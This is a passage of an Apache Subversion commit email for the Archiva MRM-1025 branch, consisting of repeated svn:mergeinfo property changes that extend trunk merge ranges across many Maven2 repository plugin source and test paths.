65534) id C26792388A16; Fri, 12 Feb 2010 01:43:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909202 [3/4] - in /archiva/branches/MRM-1025: ./ archiva-docs/src/site/apt/adminguide/ archiva-docs/src/site/resources/images/tour/ archiva-docs/src/site/xdoc/tour/ archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/ma... Date: Fri, 12 Feb 2010 01:43:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:825850-882383,883982-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:825850-882383,883982-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -1 +1 @@ -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:889228-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:889228-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:825850-882383,885006-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:825850-882383,885006-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:699795-705848 